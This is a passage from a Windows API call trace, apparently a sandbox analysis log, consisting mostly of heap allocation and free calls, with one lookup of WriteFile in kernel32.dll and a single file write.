hHeap=0x8a0000) returned 1 [0179.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0179.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0179.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0179.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0179.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0179.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0179.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0179.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0179.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0179.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0179.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0179.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0179.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0179.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0179.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0179.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0179.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0179.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0179.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9100 | out: hHeap=0x8a0000) returned 1 [0179.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0179.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0179.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0179.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0179.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0179.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0179.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0179.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0179.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0179.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0179.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0179.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0179.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0179.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0179.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0179.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0179.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0179.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0179.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0179.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0179.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0179.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0179.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0179.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0179.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0179.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0179.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0179.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0179.759] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0179.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0179.759] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0179.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0179.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0179.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b10 [0179.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0179.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0179.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0179.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0179.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18f0 [0179.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0179.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0179.759] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0179.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0179.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0179.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0179.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0179.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0179.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0179.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0179.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0179.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0179.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0179.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0179.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0179.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0179.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0179.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ac0 [0179.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0179.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0179.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0179.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b20 [0179.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0179.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7c8 [0179.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0179.760] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0179.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0179.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0179.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0179.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0179.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0179.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0179.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0179.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0179.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0179.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0179.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0179.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0179.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0179.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0179.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0179.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0179.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0179.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0179.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0179.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0179.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0179.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0179.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0179.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0179.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0179.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0179.762] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0179.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0179.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0179.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0179.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0179.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0179.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0179.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0179.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0179.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0179.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0179.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0179.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0179.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0179.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0179.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0179.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0179.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0179.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0179.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0179.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0179.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0179.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0179.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0179.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0179.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0179.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0179.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0179.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0179.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0179.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0179.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0179.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0179.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0179.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0179.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0179.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0179.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0179.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0179.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0179.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0179.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0179.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0179.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0179.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0179.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0179.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0179.764] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0179.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0179.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0179.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0179.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0179.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0179.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0179.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0179.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0179.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0179.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0179.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0179.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0179.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0179.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0179.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0179.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0179.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0179.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0179.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0179.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0179.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0179.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0179.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0179.765] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0179.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0179.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd888, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0179.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0179.766] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0179.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0179.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0179.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0179.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0179.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0179.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0179.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0179.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0179.766] WriteFile (in: hFile=0x138, lpBuffer=0xbca008*, nNumberOfBytesToWrite=0xb478, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesWritten=0x87eae0*=0xb478, lpOverlapped=0x0) returned 1 [0179.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0179.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0179.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0179.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0179.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0179.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0179.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0179.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0179.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0179.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0179.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0179.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0179.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0179.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0179.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0179.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0179.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 